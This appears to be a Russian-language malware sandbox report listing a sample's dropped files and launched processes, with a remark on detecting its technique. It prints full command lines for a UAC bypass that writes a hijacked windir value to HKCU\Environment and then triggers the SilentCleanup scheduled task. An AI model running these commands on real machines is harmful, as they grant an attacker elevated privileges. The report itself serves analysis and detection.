Техническая информация
- %WINDIR%\syswow64\notepad.exe
- %TEMP%\gtaeusq.exe
- %TEMP%\gtae
- C:\users\public\cde.bat
- C:\users\public\x.bat
- C:\users\public\x.vbs
- C:\users\public\natso.bat
- C:\users\public\x.bat
- C:\users\public\natso.bat
- C:\users\public\cde.bat
- C:\users\public\x.vbs
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\gtaeusq.exe'
- '%WINDIR%\syswow64\cmd.exe' /c C:\Users\Public\Natso.bat (со скрытым окном)
- '%WINDIR%\syswow64\notepad.exe'
- '%WINDIR%\syswow64\cmd.exe' /c C:\Users\Public\Natso.bat
- '%WINDIR%\syswow64\reg.exe' delete hkcu\Environment /v windir /f
- '%WINDIR%\syswow64\reg.exe' add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
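- '%WINDIR%\syswow64\schtasks.exe' /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
  (Примечание: три последние команды — reg delete, reg add и schtasks /Run — вместе соответствуют известному приёму обхода UAC: задача SilentCleanup выполняется с наивысшими доступными правами и подставляет %windir% из окружения пользователя, поэтому значение windir, записанное в HKCU\Environment, исполняется с повышенными привилегиями. Для обнаружения стоит отслеживать запись параметра windir в HKCU\Environment и запуск задачи SilentCleanup по требованию.)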